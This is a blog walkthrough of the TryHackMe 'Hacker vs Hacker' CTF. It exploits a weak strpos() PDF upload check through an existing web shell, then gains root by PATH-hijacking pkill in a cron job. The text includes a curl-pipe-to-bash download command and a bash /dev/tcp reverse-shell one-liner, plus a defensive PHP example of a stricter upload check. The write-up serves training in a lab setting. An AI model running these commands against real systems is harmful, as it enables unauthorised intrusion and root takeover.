TryHackMe CTF Hacker vs Hacker
Zakwan Abid
Senior Cyber Security Consultant | OSCP | eCPPT | CEH | Penetration Tester | IT/CS Auditor | GRC Specialist
Hello guys, back again with another walkthrough. This time we are going to get our hands dirty on the CTF "Hacker vs. Hacker" from TryHackMe.
Enumeration through NMAP:
nmap -sV -sC -Pn -A 10.10.168.53 -o nmap
We have two ports open.
Now let's check the website.
Now go to the page source of this website and check the source code to see if we find anything interesting.
Here we find the /cvs directory; let's check it.
Now go back to the home page of this website.
Scrolling down we get a CV upload functionality.
We all know that when a website has a file upload capability it is usually set up correctly, but sometimes you get lucky and discover a misconfigured one.
Next I decided to begin testing the file upload functionality to see if I could find any security misconfiguration it might have. I started by uploading a plain text file.
I created a simple text file and uploaded it to the website.
After uploading the file to the website I got the following:
Now check the page source to see what the back end returns.
Looking at the screenshot above we notice that there is some source code disclosure. The application is using strpos() on the file name to determine whether an uploaded file is a PDF or not, so any name containing ".pdf" passes the check regardless of its real extension.
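To make the upload bug concrete, here is an added PHP example (not the challenge's own code) that puts a weak strpos() check beside a strict one. The exact form of the original check is not shown on the page, so the weak version below is an assumption about how it was written.

```php
<?php
// Added example, not the challenge's code. The weak check is an assumption
// about the disclosed source; the strict check is the hardened form.

// Weak: passes if ".pdf" appears anywhere in the name, so "shell.pdf.php"
// is accepted even though the web server will execute it as PHP.
function weak_is_pdf(string $name): bool {
    return strpos($name, '.pdf') !== false;
}

// Strict: only the final extension counts (case-insensitive), and the
// content must start with the PDF magic bytes "%PDF-".
function strict_is_pdf(string $name, string $content): bool {
    $ext = strtolower(pathinfo($name, PATHINFO_EXTENSION));
    if ($ext !== 'pdf') {
        return false;
    }
    return substr($content, 0, 5) === '%PDF-';
}

// Never keep the client-supplied name on disk: store under a random
// server-generated name with a fixed extension.
function safe_store_name(): string {
    return bin2hex(random_bytes(16)) . '.pdf';
}

// Constructed sample uploads: name and first bytes of content.
$cases = [
    ['cv.pdf',        '%PDF-1.4 ...'],          // genuine PDF
    ['shell.pdf.php', '<?php /* not a PDF */'], // double extension from the walkthrough
    ['notes.PDF',     'plain text'],            // right extension, wrong content
];
foreach ($cases as [$name, $content]) {
    printf("%-15s weak=%s strict=%s\n", $name,
        weak_is_pdf($name) ? 'accept' : 'reject',
        strict_is_pdf($name, $content) ? 'accept' : 'reject');
}
```

Even with the strict check, the upload directory should be served with PHP execution disabled so a bypass of the name check cannot become code execution.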
Enumeration Through Gobuster:
Now I start directory searching using gobuster.
Gobuster is a tool used to brute-force URIs, including directories and files, as well as DNS subdomains.
gobuster dir -u https://10.10.168.53/cvs/ -w /home/zkwan/Git/SecLists/Discovery/Web-Content/common.txt -x .pdf.php -t 50
From the gobuster result we got /shell.pdf.php.
Now check it on the website.
Here we got access to /shell.pdf.php.
Basic PHP Enumeration
Now I check basic PHP enumeration by passing the following cmd parameter:
/shell.pdf.php?cmd=id
So it is vulnerable to command injection. Now let's get a reverse shell.
Initial Foothold:
Create Reverse Shell
Here the above IP is from my VPN. Copy this PHP one-liner and create a file with this code.
Now start the Python web server to upload this reverse shell to the website.
Now start an nc listener in another tab.
Go to the website and type the following cmd in the URL:
cmd=curl https://10.8.78.190:8080/revshell.sh | bash
Check your nc listener; there you will get a reverse shell.
As you can see in the above picture, I'm able to get the user flag.
Privilege Escalation:
I went looking through the lachlan directory and noticed the .bash_history file.
Upon enumerating it, I found a few commands had been run:
The password for user lachlan was changed with echo -e command.
Looking at /etc/cron.d/persistence, we can maybe get backup.sh to run as root every minute.
Looking at the cronjob file we notice a vulnerability that leads to code execution as root. The PATH variable determines where the binaries invoked by the cronjob are looked up.
The cron daemon will first search /home/lachlan/bin for the binaries, followed by /bin and lastly /usr/bin.
Since we have read and write privileges on /home/lachlan/bin we can just drop our binary there, and whenever root runs the cronjob it will execute our binary instead of the real one. But looking at the cronjob again we notice that some binaries are called with absolute paths, meaning they cannot be hijacked, while pkill is called with a relative path.
So we can just log in to the system and put a malicious binary in /home/lachlan/bin which, when executed, will give us a root shell.
Now log in with SSH.
But the SSH session keeps getting terminated after a few seconds; this is due to the cronjob that is running as root.
Now exit this session and start a netcat listener on port 4545:
Now log in again via SSH.
After login, execute the command below before being kicked out by the cronjob:
echo "bash -c 'bash -i >& /dev/tcp/10.8.78.190/4545 0>&1'" > bin/pkill ; chmod +x bin/pkill
Check your netcat listener; there you will get a reverse shell as root.
That's all guys, the CTF is done. We have successfully captured two flags, one from user access and the other from root access.
I hope you enjoyed the walkthrough. If so, like it down below and follow me as well so that you won't miss any upcoming walkthroughs.
Comment from Enterprise Architect, CCSP | TOGAF | CHFI | CEH | DevSecOps (2 years ago): Stay committed.